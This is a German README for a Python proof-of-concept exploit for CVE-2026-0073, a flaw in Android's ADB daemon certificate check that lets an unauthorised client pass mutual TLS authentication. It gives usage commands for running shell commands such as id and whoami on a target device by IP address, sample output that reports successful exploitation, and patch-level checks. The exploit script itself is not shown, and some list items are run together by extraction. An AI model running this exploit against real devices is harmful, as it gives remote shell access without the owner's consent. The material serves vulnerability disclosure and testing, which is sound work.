
CVE-2026-0073 - ADB Umgehung der drahtlosen gegenseitigen Authentifizierung PoC
Dieses Verzeichnis enthält einen Python Proof-of-Concept für CVE-2026-0073.
Das Skript wurde unter Verwendung KI-gestützter Codegenerierungstechniken erstellt.
CVE-2026-0073 ist ein logisches Problem in der ADB-Daemon-Zertifikatsprüfung (adbd_tls_verify_cert in auth.cpp). Die anfällige Prüfung behandelt jede Rückgabe ungleich Null von EVP_PKEY_cmp(...) als erfolgreiche Übereinstimmung.
Die erwartete Behandlung des Vergleichsergebnisses sollte sein:
1 = Schlüssel stimmen überein0 = Schlüssel stimmen nicht übereinIn anfälligen Builds werden negative Werte als wahr behandelt und können ein Zertifikat fälschlicherweise als autorisiert markieren.
poc-cve-2026-0073.py machtDas Skript:
ec oder ed25519).shell: mit exec: Fallback).cryptographyAbhängigkeit installieren:
pip install cryptography
Ziel-ADB-Dienst erkennen (falls erforderlich):
adb mdns services
PoC ausführen:
python3 poc-cve-2026-0073.py <target_ip> [port] [command] [key_type] [--verbose]
Argumente:
target_ip: IP-Adresse des Android-Zielgerätsport: ADB-Port (Standard: 5555)command: Auszuführender Befehl (Standard: id)key_type: ec oder ed25519 (Standard: ec)--verbose: Protokoll-Debug-Logs aktivierenBeispiele:
python3 poc-cve-2026-0073.py 192.168.1.100 5555 id
python3 poc-cve-2026-0073.py 192.168.1.100 5555 whoami ec --verbose
python3 poc-cve-2026-0073.py 192.168.1.100 5555 getprop ed25519
[*] Opening service: 'shell:id'
[*] After OPEN, received: OKAY arg0=2 data=b''
[+] Stream open (local_id=1, remote_id=2)
[+] Command output:
----------------------------------------
uid=2000(shell) gid=2000(shell) ...
----------------------------------------
[+] Exploitation successful.
Connection refused
certificate_unknown
--verbose für Paketebenen-Traces.Das Sicherheitspatch-Level des Basis-Betriebssystems und das Patchen von Mainline-Modulen können unterschiedlich sein. Ein Gerät kann einen älteren monatlichen SPL anzeigen, während es neuere ADB-Modul-Fixes erhält.
Nützliche Prüfungen:
adb shell getprop ro.build.version.security_patch
adb shell pm list packages --apex-only | grep adbd
adb shell dumpsys package com.google.android.adbd | grep -E "versionCode|versionName|lastUpdateTime"
Verwenden Sie diesen PoC nur in autorisierten Umgebungen (eigene Laboreinrichtungen, ausdrückliche Genehmigung oder sanktionierte Tests). Führen Sie dies nicht gegen Systeme aus, die Ihnen nicht gehören oder für die Sie keine schriftliche Genehmigung zum Testen haben.
daemon/auth.cpp)